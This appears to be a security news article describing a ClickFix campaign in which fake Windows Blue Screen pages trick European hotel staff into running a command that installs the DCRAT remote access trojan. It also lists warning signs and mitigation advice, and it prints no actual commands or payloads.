ClickFix Campaign Uses Fake Windows Blue Screen Errors to Trick Hotel Staff Into Installing Malware

By Ash K
ClickFix Campaign Uses Fake Windows Blue Screen Errors to Trick Hotel Staff Into Installing Malware

A new wave of ClickFix social engineering attacks is targeting the European hospitality sector by abusing one of the most recognisable elements of the Windows operating system: the Blue Screen of Death. By presenting hotel staff with convincing fake crash screens, attackers are manipulating victims into manually executing malicious commands that lead to full system compromise.

The campaign combines phishing, browser-based deception, and hands-on keyboard interaction, marking a shift away from fully automated malware delivery toward attacks that rely on user compliance under pressure.

How the ClickFix attack works

The attack typically begins with a phishing message posing as a Booking.com reservation notification or cancellation request. Hotel staff are directed to click a link to view urgent booking details.

Instead of a legitimate reservation page, victims are redirected to a malicious website that abruptly displays a full-screen fake Windows Blue Screen of Death. The page mimics Microsoft’s crash screen layout, colour scheme, and language with high accuracy.

Fake Windows BSOD screen used in ClickFix attacks

The screen falsely claims the system has encountered a critical error and instructs the user to follow recovery steps to restore normal operation.

From fake error to real infection

Victims are instructed to open the Windows Run dialog or Command Prompt and paste a provided command. The instructions are presented as a system recovery procedure, often framed as guidance from Microsoft support.

Once executed, the command downloads and launches malware directly from attacker-controlled infrastructure. This approach bypasses many email and browser-based security controls because the user initiates the action themselves.

Malware deployed in the campaign

Analysis of the payloads linked to ClickFix attacks shows the use of DCRAT, a well-known Remote Access Trojan. DCRAT provides attackers with persistent access to infected systems, allowing them to remotely control the machine, execute commands, and exfiltrate data.

The malware is capable of keylogging, file theft, screenshot capture, and lateral movement within internal networks. Once installed on a hotel system, attackers can monitor reservation systems, payment workflows, and internal communications.

Why the hospitality sector is being targeted

Hotels and hospitality businesses operate under constant time pressure and rely heavily on third-party booking platforms. Staff are accustomed to responding quickly to reservation changes, cancellations, and customer issues.

Attackers exploit this environment by creating scenarios that feel urgent and operationally disruptive. A sudden system crash during peak hours increases the likelihood that staff will follow instructions without verification.

Scale and impact of the campaign

Security researchers tracking the ClickFix activity report multiple European countries affected, with hotels and short-stay accommodation providers making up the majority of known victims.

While exact infection numbers have not been disclosed, telemetry from incident response firms suggests dozens of compromised systems across hospitality networks, with potential exposure of customer data, internal credentials, and booking records.

Why fake BSODs are effective

The Windows Blue Screen of Death carries a strong psychological impact. Users associate it with serious system failure and loss of control.

By replicating the BSOD, attackers remove familiar browser cues and replace them with a scenario where users feel dependent on on-screen instructions. This significantly lowers scepticism, even among experienced staff.

Detection challenges

Because the malware execution is initiated manually by the victim, traditional detection methods may not flag the activity as suspicious. The command is often run using legitimate Windows tools, and the initial payload may be small and obfuscated.

By the time abnormal behaviour is detected, attackers may already have established persistence.

What organisations should watch for

Indicators linked to ClickFix activity include unexpected full-screen error pages delivered through web browsers, employees being instructed to run commands copied from websites, and outbound connections to unfamiliar infrastructure shortly after such events.

Security teams should also watch for new scheduled tasks, registry persistence entries, and unauthorised remote access tools.

Steps to reduce risk

Experts recommend training staff to treat any browser-delivered system error as suspicious. Legitimate Windows crash screens do not provide interactive instructions or ask users to run commands.

Restricting the ability of non-administrative users to execute command-line tools and monitoring for unusual PowerShell or cmd.exe activity can significantly reduce the effectiveness of such attacks.

What Next?

Security researchers expect ClickFix-style attacks to expand beyond hospitality into other service-driven industries where staff interact with external platforms under time pressure.

The campaign highlights how attackers continue to move away from purely technical exploits, instead focusing on deception that turns users into active participants in their own compromise.

Ash K
Ash K
Ashton is a seasoned Cybersecurity Professional with over 25 years of experience in Cybersecurity Research, Cybersecurity Incident response, Products and Security Solutions architecture.